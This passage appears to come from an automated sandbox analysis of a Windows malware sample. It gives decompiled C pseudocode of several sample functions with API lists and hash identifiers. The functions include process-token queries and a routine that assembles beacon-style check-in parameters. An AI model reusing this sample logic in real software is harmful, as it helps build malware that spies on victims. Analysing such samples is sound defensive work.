                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04633E08,?,?,?,?,00000102,046367B8,?,?,00000000), ref: 04635AFD
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                            • Part of subcall function 0463A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04635B2B,00000000,00000001,00000001,?,?,04633E08,?,?,?,?,00000102), ref: 0463A790
                                                            • Part of subcall function 0463A782: StrChrA.SHLWAPI(?,0000003F,?,?,04633E08,?,?,?,?,00000102,046367B8,?,?,00000000,00000000), ref: 0463A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04633E08,?,?,?,?,00000102,046367B8,?), ref: 04635B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04635B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04635B77
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 4e8ba033856f4d4a060f9d7c45f38dd3a356dc30508ab84b25d242788f509c56
                                                          • Instruction ID: cea6cd8332b6bea221a5898a693f400339d608d4d5e5ffc654fc67742c243039
                                                          • Opcode Fuzzy Hash: 4e8ba033856f4d4a060f9d7c45f38dd3a356dc30508ab84b25d242788f509c56
                                                          • Instruction Fuzzy Hash: 5A210F765002D5FBDB126FB4CC94AAABFB9EF16286B054094F8069F201F735E90197E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E046345C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E0463A71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04EC935C,?,04638D93,004F0053,04EC935C,?,?,?,?,?,?,0463523E), ref: 046345D6
                                                          • lstrlenW.KERNEL32(04638D93,?,04638D93,004F0053,04EC935C,?,?,?,?,?,?,0463523E), ref: 046345DD
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04638D93,004F0053,04EC935C,?,?,?,?,?,?,0463523E), ref: 046345FD
                                                          • memcpy.NTDLL(74B069A0,04638D93,00000002,00000000,004F0053,74B069A0,?,?,04638D93,004F0053,04EC935C), ref: 04634610
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 0b986ec248656c1334e265fb42acabcb86f785ff3fed1c67b6deaf85dbeb96c9
                                                          • Instruction ID: 6e564d832996385481c920ec7d371ddc524a9014853c7238a72e009760ce01dd
                                                          • Opcode Fuzzy Hash: 0b986ec248656c1334e265fb42acabcb86f785ff3fed1c67b6deaf85dbeb96c9
                                                          • Instruction Fuzzy Hash: 3BF04936900118BBDF11EFA8CC84C9FBBACEF092597114066FA04D7201FB35EA149BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(04EC9A78,00000000,00000000,7742C740,046320ED,00000000), ref: 0463362A
                                                          • lstrlen.KERNEL32(?), ref: 04633632
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • lstrcpy.KERNEL32(00000000,04EC9A78), ref: 04633646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04633651
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: a14d763c687176a9d93515b4396a6198380cc3de2fd63feaac7416c5bdc1051a
                                                          • Instruction ID: 694a8923a31f981d9ffef05e88514e4645bf3044264ee2c674251b7b1be16f8f
                                                          • Opcode Fuzzy Hash: a14d763c687176a9d93515b4396a6198380cc3de2fd63feaac7416c5bdc1051a
                                                          • Instruction Fuzzy Hash: 65E012735016A16B8711ABE4AC48C6BBBBDEF996527040417F700E3211E73ADC059BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 38%
                                                          			E04675A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E0467A71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E0467A734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04675A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04675A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04675A9D
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04675ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04675AC7
                                                          • NtClose.NTDLL(?), ref: 04675AD9
                                                          • NtClose.NTDLL(00000000), ref: 04675AE3
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: c0cc7aeba4ac9b09ed8404ec0d379beb73e0cc1539ad195c3d4f87ee59e9df26
                                                          • Instruction ID: 1dcb5fc385487142d55bac56490e617039854015ca43dd1b3837e68a16ae932d
                                                          • Opcode Fuzzy Hash: c0cc7aeba4ac9b09ed8404ec0d379beb73e0cc1539ad195c3d4f87ee59e9df26
                                                          • Instruction Fuzzy Hash: 0F21E672900218BBDB01AF95CC85ADEBFBDFF48750F104066FA06E6110E7769A449BE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E04674AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				signed int _t111;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x467d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x467d014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x467d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 =  *0x467d00c; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x467d2a8; // 0x47a5a8
                                                          				_t3 = _t64 + 0x467e633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x467d02c,  *0x467d004, _t59);
                                                          				_t67 = E046756CD();
                                                          				_t68 =  *0x467d2a8; // 0x47a5a8
                                                          				_t4 = _t68 + 0x467e673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71; // executed
                                                          				_t72 = E046758DB(_t134); // executed
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x467d2a8; // 0x47a5a8
                                                          					_t7 = _t126 + 0x467e8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x467d238, 0, _v8);
                                                          				}
                                                          				_t73 = E0467A199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x467d2a8; // 0x47a5a8
                                                          					_t11 = _t121 + 0x467e8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x467d238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x467d32c; // 0x4af95b0
                                                          				_t75 = E04674622( &E0467D00A, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					RtlFreeHeap( *0x467d238, _t152, _a16); // executed
                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x467d238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x467d238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E0467518F(GetTickCount());
                                                          					_t82 =  *0x467d32c; // 0x4af95b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x467d32c; // 0x4af95b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x467d32c; // 0x4af95b0
                                                          					_t148 = E04671BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x467d238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x467c28c);
                                                          					_push(_t148);
                                                          					_t94 = E0467361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x467d238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E04679070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E04676761();
                                                          						L22:
                                                          						HeapFree( *0x467d238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E046769B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_t111 = E0467391F(_t157, _a4, _a8, _a12); // executed
                                                          						_v12 = _t111;
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E0467A734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E04675800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E0467A734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}
                                                          0x04674d5d
                                                          0x04674d5f
                                                          0x00000000
                                                          0x04674d5f
                                                          0x04674ca4
                                                          0x04674ca9
                                                          0x04674cae
                                                          0x04674cb3
                                                          0x04674cbe
                                                          0x04674cc3
                                                          0x04674cc6
                                                          0x04674ccc
                                                          0x04674cd2
                                                          0x04674cd8
                                                          0x04674cdb
                                                          0x04674ce1
                                                          0x04674ce4
                                                          0x04674ce9
                                                          0x04674ced
                                                          0x04674ced
                                                          0x04674cf9
                                                          0x04674d05
                                                          0x04674d09
                                                          0x04674d0b
                                                          0x04674d10
                                                          0x04674d12
                                                          0x04674d17
                                                          0x04674d1c
                                                          0x04674d29
                                                          0x04674d31
                                                          0x04674d34
                                                          0x04674d34
                                                          0x04674d10
                                                          0x00000000
                                                          0x04674cfb
                                                          0x04674cff
                                                          0x04674d36
                                                          0x04674d39
                                                          0x04674d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04674d42
                                                          0x04674d01
                                                          0x00000000
                                                          0x04674d01
                                                          0x04674cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04674ACA
                                                          • wsprintfA.USER32 ref: 04674B1A
                                                          • wsprintfA.USER32 ref: 04674B37
                                                          • wsprintfA.USER32 ref: 04674B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04674B75
                                                          • wsprintfA.USER32 ref: 04674B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04674BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04674BD4
                                                          • GetTickCount.KERNEL32 ref: 04674BE5
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 04674BF9
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 04674C17
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046720C2,?,04AF95B0), ref: 04671BE1
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(?,?,?,046720C2,?,04AF95B0), ref: 04671BE9
                                                            • Part of subcall function 04671BB6: strcpy.NTDLL ref: 04671C00
                                                            • Part of subcall function 04671BB6: lstrcat.KERNEL32(00000000,?), ref: 04671C0B
                                                            • Part of subcall function 04671BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04671C28
                                                          • StrTrimA.SHLWAPI(00000000,0467C28C,?,04AF95B0), ref: 04674C4E
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(04AF9A78,00000000,00000000,7742C740,046720ED,00000000), ref: 0467362A
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(?), ref: 04673632
                                                            • Part of subcall function 0467361A: lstrcpy.KERNEL32(00000000,04AF9A78), ref: 04673646
                                                            • Part of subcall function 0467361A: lstrcat.KERNEL32(00000000,?), ref: 04673651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04674C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04674C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04674C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04674C8B
                                                            • Part of subcall function 04679070: lstrlen.KERNEL32(?,00000000,04AF9A98,00000000,04678808,04AF9C76,?,?,?,?,?,63699BC3,00000005,0467D00C), ref: 04679077
                                                            • Part of subcall function 04679070: mbstowcs.NTDLL ref: 046790A0
                                                            • Part of subcall function 04679070: memset.NTDLL ref: 046790B2
                                                          • wcstombs.NTDLL ref: 04674D1C
                                                            • Part of subcall function 0467391F: SysAllocString.OLEAUT32(?), ref: 0467395A
                                                            • Part of subcall function 0467391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 046739DD
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04674D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04674D69
                                                          • HeapFree.KERNEL32(00000000,?,?,04AF95B0), ref: 04674D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04674D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04674D8D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: 2d1364610b7a57dfbea259edad36fbfe2d19ea13c2640fb93c934d6a644ac7de
                                                          • Instruction ID: a3ae74d1cfb19acda352d530010cf9e43366b2bf78a5bdcbf4d35b3a7af71135
                                                          • Opcode Fuzzy Hash: 2d1364610b7a57dfbea259edad36fbfe2d19ea13c2640fb93c934d6a644ac7de
                                                          • Instruction Fuzzy Hash: FD914771900108BFDB15DFA8DC88AAE7BB9EF48354F144455F909E7220EB39ED51DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E0467AC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				struct HINSTANCE__* _t99;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x4670000;
                                                          				_t115 = _t139[3] + 0x4670000;
                                                          				_t131 = _t139[4] + 0x4670000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x4670000;
                                                          				_v16 = _t139[5] + 0x4670000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x4670002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x467d1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x467d1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x467d1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x467d19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x467d1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t99 = LoadLibraryA(_v60); // executed
                                                          						_t138 = _t99;
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x467d198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x467d198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x467d19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}

                                                          0x0467ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0467ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0467AD4B
                                                          • GetLastError.KERNEL32 ref: 0467AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0467AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: da6039a84fed890604a7838a081eb3effd02dbd044428b042ab2dc342804c8e7
                                                          • Instruction ID: 8fc2585fe8e8f29548176cb7e7d475df1f97a6025ceb4a548940abfd741202b5
                                                          • Opcode Fuzzy Hash: da6039a84fed890604a7838a081eb3effd02dbd044428b042ab2dc342804c8e7
                                                          • Instruction Fuzzy Hash: D4811975A00205AFDB25CFA8D884AAEB7F5FF58311F14842AE905E7340FBB4E945CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E046751B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
